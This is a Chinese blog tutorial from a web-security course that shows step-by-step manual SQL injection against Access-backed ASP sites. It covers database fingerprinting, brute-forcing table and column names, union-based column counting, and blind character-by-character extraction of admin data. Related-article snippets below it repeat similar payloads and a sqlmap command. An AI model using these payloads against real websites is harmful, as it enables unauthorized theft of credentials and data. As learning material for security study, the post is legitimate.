网络安全进阶学习第十二课——SQL手工注入3(Access数据库)

最新推荐文章于 2024-01-03 11:11:10 发布
最新推荐文章于 2024-01-03 11:11:10 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: web安全 文章标签: web安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p36273/article/details/132137792
版权

文章目录

注入流程:

判断数据库类型 ——> 判断表名 ——> 判断列名 ——> 判断列名长度 ——> 查出数据。

asp的网站,常用数据库为access、sqlserver。

1、判断数据库类型

and exsits (select * from msysobjects)>0 access
and exsits (select * from sysobjects)>0 sqlserver

上述语句会返回1或者0
msysobjects是access的默认数据库
sysobjects是sqlserver的默认数据库

如图:
在这里插入图片描述
在这里插入图片描述
这里就能判断是access的数据库。

2、判断表名

遍历表名:and exists (select * from 表名)
#存在就返回正常页面,不存在就报错。

举例:
and exists (select * from admin_user)

使用BP对后面的admin_user所在位置的值进行遍历
假设这里跑出来表名就是:admin_user

3、判断列名

遍历列名:and exists (select 列名 from 表名)
#存在就返回正常页面,不存在就报错。

举例:
and exists (select admin from admin_user)

已经得知表名是admin_user,使用BP对列名admin所在位置的值进行遍历
假设这里跑出来列名就是:admin

4、判断列数

order by 7
在这里插入图片描述
前提:页面中需要有显示位

1)判断显示位

使用联合查询
union select 1,2,3,4,5,6,7 from admin_user

5、判断数据长度

and (select top 1 len(列名) from 表名)>5
#此为此列第一条数据的长度,判断其是不是大于5

and (select top 1 len(列名) from 表名)=5
#此为此列第一条数据的长度是不是等于5

举例:
and (select top 1 len(admin) from admin_user)=5

假如返回是真,那就说明admin_user这个表里面对应的admin这一列的第一个数据长度时5.

6、爆破数据内容

and (select top 1 asc(mid(列名,位数,1)) from admin)=97
#mid()用于从文本中提取字段,mid(列名,起始位置,要返回的字符数)
#asc()是进行ASCII编码

举例:
and (select top 1 asc(mid(admin,1,1)) from admin_user)=97(97对应的字母为a)

#若返回真,说明admin_user这个表中admin字段对应的那一列的第一条数据的第一位是 ’ a ’

p36273
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入access数据库
weixin_46476861的博客
02-18 408
猜解数据库表名 猜解数据库字段名 猜解字段内容 order by与union select联合查询,可以快速地获得字段长度及字段内容 自动化注入工具破解数据库方法 穿山甲工具 havij(胡萝卜标志)工具 ...
SQL注入原理-手工注入access数据库
Unitue_逆流
01-24 5172
一、Target: SQL注入原理、学习手工注入过程 二、实验原理:通过把SQL命令插入到web表单提交或输入域名或页面请求的的查询字符串,最终达到欺骗服务器执行恶意的SQL命令 1、在结尾的链接中依次添加【’】和【and 1=1】和【and 1=2】判断网站是否存在注入点 2、添加语句【and exists(select*from admin)】根据页面返回结果来猜解表名 3、添加【a
网络安全原理与应用:SQL手工注入.pptx
05-16
第7章 Web应用安全SQL手工注入目标要求Objectives了解SQL手工注入的基本方法;掌握在DVWA平台上进行SQL手工注入的方法;SQL手工注入一、SQL手工注入知识点任务通过SQL手工注入的方法获取admin的密码1、检查是否存在注入点2、猜解SQL查询语句的字段数3、获取数据库名称4、获取数据表名5、获取字段名6、获取字段数据SQL手工注入二、SQL手工注入示例1、进入DVWA平台,选择DVWA Security,将安全级别设置为Low。2、选择SQL Injection,进入如下页面。SQL手工注入二、SQL手工注入示例3、尝试输入单引号’,得到报错,说明页面存在注入点,同时很有可能是字符型注入4、输入 1 ‘ or 1 = 1 #,查询成功。SQL手工注入二、SQL手工注入示例5、猜解SQL查询语句中的字段数。1'or 1=1 order by 1 #1'or 1=1 order by 2 #1'or 1=1 order by 3 #当输入1‘or 1=1 order by 3 #时,系统会报错,提示“ Unknown column ’3‘ in ’order cla
SQL注入access数据库
KHOST的博客
04-23 399
首先是sql注入产生的条件: 1.参数的传递 2.参数值可以带入到数据库 我这里是本地搭建的环境,接另外一种方法注入 手工注入值半猜解 第一步 判断是否可以注入 URL:http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and 1=1 返回正常 and 1=2 返回不正常 第二步 猜解数据库表名 语句...
sqlmap之(三)----Access注入实战
热门推荐
fendo
02-27 1万+
(1) 猜解是否能注入 sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" it looks like the back-end DBMS is 'Microsoft Access'. Do you want to skip test payloads specific f
Access数据库注入方法及防范
xabc3000的专栏
05-30 3264
Access数据库想对于MsSql来说可谓小巫见大巫,但是Acc的数据库在目前国内还是有一定的市场,其注入也很灵活。相信你看完本文就会了解到Access也是很强大的。 一,基础篇 1、猜解表名,这里借用啊D的语句: and exists (select * from 表名) 2、猜解列名: and exists (select 字段 from 表名) UNION法,在执行union之前
Access注入详细笔记
weixin_46007361的博客
10-10 2042
Access注入
有关access数据库sql注入的问题
a843538946的专栏
12-12 497
设计一个access 数据库如下   如果用这个语句 SELECT * FROM 表1 where id=1 union select 1,2,3; 会报错  如果改成这样 SELECT * FROM 表1 where id=1 union select 1,2,3 from 表1; 则没问题 而且结果如下 发现 1,2,3是放在前面的 再改成这样SELECT * FRO...
Access数据库中的SQL注入(无waf)
kali_boy的博客
11-27 3201
一.关于Access数据库和简单注入用到的SQL 1.access数据库 Microsoft Office Access是由微软发布的关系数据库管理系统,也就是说在我们的
SQL注入学习--access
ghoooos的博客
02-03 1285
SQL注入access注入,偏移注入
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
数据库技术及应用——SQL Server件 3数据库管理与使用.ppt
01-21
数据库技术及应用——SQL Server
SQL注入式攻击下的数据库安全——SQL Server下SQL注入攻击的有效防范.pdf
09-19
SQL注入式攻击下的数据库安全——SQL Server下SQL注入攻击的有效防范.pdf
数据库高可用性——SQL_Server_2005数据库复制简单图解.doc
06-06
数据库高可用性——SQL_Server_2005数据库复制简单图解
Web漏洞-access注入Sql Sever(Mssql注入、PostgreSql注入、Orache注入、MongoDB注入、Oracle注入-SQLmap使用教程-附实例
ran的博客
01-15 1736
Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb是以键值对形式(类似于JSON)进行查询的。这里是一个跟Mysql数据库的一个不同的位置,PostgreSql数据库union select后用。因为access数据库不包含数据库名,所以直接从表名开始查询。最后将password解密后进入后台复制KEY提交即可。”,所以在注入过程中需要我们进行暴力猜解。------>注意与Mysql进行对比。在进行注入时,要注意对。sqlmap使用教程。
SQL注入(Access、Mssql)
最新发布
jxy158212的博客
01-03 1057
之前的文章,已经详细介绍了sql注入的原理,和常见sql注入方式,并以MySql数据库进行了简单的示例。接下来,我们将以Access和Mssql数据库为例进行讲解。
渗透测试---手把手教你SQL注入(7)---Access数据库注入
weixin_52796034的博客
10-16 418
在讨论SQL注入中的Access数据库注入时,首先需要了解Access数据库的一些基本知识。Microsoft Access 是一种关系型数据库管理系统,可用于存储、管理和检索数据。虽然Access通常用于较小的数据库和单服务器环境,但它也可以用于大型企业和互联网应用。 此外,Access与其他数据库管理系统(如MySQLSQL Server等)在处理SQL注入方面有所不同。
网络安全-SQL注入(3)】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用
m0_67844671的博客
10-01 807
本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
SQL注入&Access&Mysql
weixin_54882883的博客
05-13 440
知识点: 1、脚本代码与数据库前置知识 2、Access数据库注入-简易&偏移 3、MYSQL数据库注入-简易&权限跨库 前置知识: SQL注入漏洞产生原理分析 SQL注入漏洞其实他就产生在脚本代码和数据库正在通讯会话的时候产生的 脚本代码在实现代码与数据库进行数据通讯时(从数据库取出相关数据进行页面显示),将定义的SQL语句进行执行查询数据时。其中的SQL语句能通过参数传递自定义值来实现控制SQL语句,从而执行恶意的SQL语句,可以实现查询其他数据(数据库中的敏感数据,如管理员帐号密码)
sql注入access数据库
10-09
对于Access数据库,防止SQL注入攻击的关键是使用化查询来处理用户输入的数据,而不直接拼接SQL语句。参数化查询可以有效防止恶意用户输入恶意代码进行攻击。 下面是一个示例代码,展示了如何使用C#和ADO.NET执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值